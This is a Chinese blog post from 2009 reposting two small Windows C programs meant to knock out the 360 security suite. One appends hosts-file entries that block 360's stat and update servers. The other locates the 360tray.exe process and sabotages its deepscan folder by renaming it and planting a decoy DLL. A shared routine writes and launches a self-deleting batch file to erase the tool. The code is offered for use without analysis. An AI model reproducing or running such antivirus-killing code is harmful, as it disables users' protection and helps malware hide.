首页 > 技术文章 > 2个K掉360的代码

2个K掉360的代码

2009年9月19日 发表评论 453 views 阅读评论

在JKS上看到的,代码如下:

ONE

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char FileName[128];
GetSystemDirectoryA(FileName, 0x104u);
lstrcatA(FileName, "\\drivers\\etc\\hosts");
HANDLE hFile = CreateFileA(FileName, 0x40000000, 0, 0, 3u, 0x20, 0);
if ( FileName == (HANDLE)-1 )
ExitProcess(0);
if ( SetFilePointer(hFile, 0, 0, 2) != -1 )
{
DWORD NumberOfBytesWritten;
WriteFile(hFile, "\r\n127.0.0.1 \tstat.360safe.com\r\n127.0.0.1 \tqup.f.360.cn", 0x35u, &NumberOfBytesWritten, 0);
}
CloseHandle(hFile);
sub_401000();
return 0;
}

TWO

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char PathName[512]={0};
PROCESSENTRY32 pe;
RtlZeroMemory(&pe,128);
pe.dwSize=128;
HANDLE hSnapshot=CreateToolhelp32Snapshot(2,0);
BOOL v0=Process32First(hSnapshot,&pe);
while(v0)
{
if(!lstrcmpi(pe.szExeFile,"360tray.exe"))
{
HANDLE hProcess=OpenProcess(0x410,0,pe.th32ProcessID);
if(hProcess)
{
if(GetModuleFileNameEx(hProcess,0,PathName,0x4000))
{
SetCurrentDirectoryA(PathName);
MoveFileA("deepscan", "fuck");
CreateDirectoryA("deepscan", 0);
CreateFileA("deepscan\\deepscan.dll", 0x40000000u, 0, 0, 2u, 2u, 0);
CopyFileA("fuck\\360deepscan.exe", "deepscan\\360deepscan.exe", 1);
CopyFileA("fuck\\360FkAdv.sys", "deepscan\\360FkAdv.sys", 0);
CopyFileA("fuck\\360wservice.dll", "deepscan\\360wservice.dll", 0);
CopyFileA("fuck\\BREGDLL.dll", "deepscan\\BREGDLL.dll", 0);
CopyFileA("fuck\\BREGDRV.sys", "deepscan\\BREGDRV.sys", 0);
CopyFileA("fuck\\BREGDRV.sys.dat", "deepscan\\BREGDRV.sys.dat", 0);
CopyFileA("fuck\\cloudcom.dll", "deepscan\\cloudcom.dll", 0);
CopyFileA("fuck\\cloudsec.dll", "deepscan\\cloudsec.dll", 0);
CopyFileA("fuck\\FrontScan.dll", "deepscan\\FrontScan.dll", 0);
CopyFileA("fuck\\heavygate.dll", "deepscan\\heavygate.dll", 0);
CopyFileA("fuck\\libbsi.dat", "deepscan\\libbsi.dat", 0);
CopyFileA("fuck\\libbti.dat", "deepscan\\libbti.dat", 0);
}
}
CloseHandle(hProcess);
}
v0=Process32Next(hSnapshot, &pe);
}
sub_401000();
ExitProcess(0);
return 0;
}

公共

BOOL __cdecl sub_401000()
{
LPSTR v0; // edx@2
LPSTR v1; // ecx@2
CHAR v2; // al@3
HANDLE v4; // eax@1
char *v5; // eax@1
HANDLE v6; // eax@1
int v7; // eax@6
HANDLE hHeap; // [sp+10h] [bp-Ch]@1
LPSTR lpMem; // [sp+8h] [bp-14h]@1
LPCH lpString2; // [sp+Ch] [bp-10h]@1
LPSTR lpFileName; // [sp+4h] [bp-18h]@1
LPCSTR lpBuffer; // [sp+0h] [bp-1Ch]@1
HANDLE hObject; // [sp+18h] [bp-4h]@1
DWORD NumberOfBytesWritten; // [sp+14h] [bp-8h]@6
v4 = GetProcessHeap();
hHeap = v4;
v5 = (char *)HeapAlloc(v4, 0, 0x7F8) + 260;
lpMem = v5;
v5 += 260;
lpString2 = v5;
v5 += 260;
lpFileName = v5;
lpBuffer = v5 + 260;
GetTempPathA(0x104, v5);
lstrcatA(lpFileName, "DelUS.bat");
v6 = CreateFileA(lpFileName, 0x40000000, 0, 0, 2u, 0x8000080, 0);
hObject = v6;
if ( v6 != (HANDLE)-1 )
{
GetModuleFileNameA(0, lpString2, 0x104);
lstrcpyA(lpMem, lpString2);
v0 = lpMem;
v1 = lpMem;
do
{
v2 = *v0;
if ( *v0 == 92 )
v1 = v0;
++v0;
}
while ( v2 );
*(v1 + 1) = 0;
lstrcatA((LPSTR)lpBuffer, ":Repeat\r\n");
lstrcatA((LPSTR)lpBuffer, "del \"");
lstrcatA((LPSTR)lpBuffer, lpString2);
lstrcatA((LPSTR)lpBuffer, "\"");
lstrcatA((LPSTR)lpBuffer, "\r\nif exist \"");
lstrcatA((LPSTR)lpBuffer, lpString2);
lstrcatA((LPSTR)lpBuffer, "\" goto Repeat\r\n");
lstrcatA((LPSTR)lpBuffer, "rmdir \"");
lstrcatA((LPSTR)lpBuffer, lpMem);
lstrcatA((LPSTR)lpBuffer, "\"\r\ndel \"");
lstrcatA((LPSTR)lpBuffer, lpFileName);
lstrcatA((LPSTR)lpBuffer, "\"\r\n");
v7 = lstrlenA(lpBuffer);
NumberOfBytesWritten = v7;
WriteFile(hObject, lpBuffer, v7, &NumberOfBytesWritten, 0);
CloseHandle(hObject);
ShellExecute(0, "open", lpFileName, 0, 0, 0);
}
return HeapFree(hHeap, 0, lpMem);
}

相关文章

分类: 技术文章 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.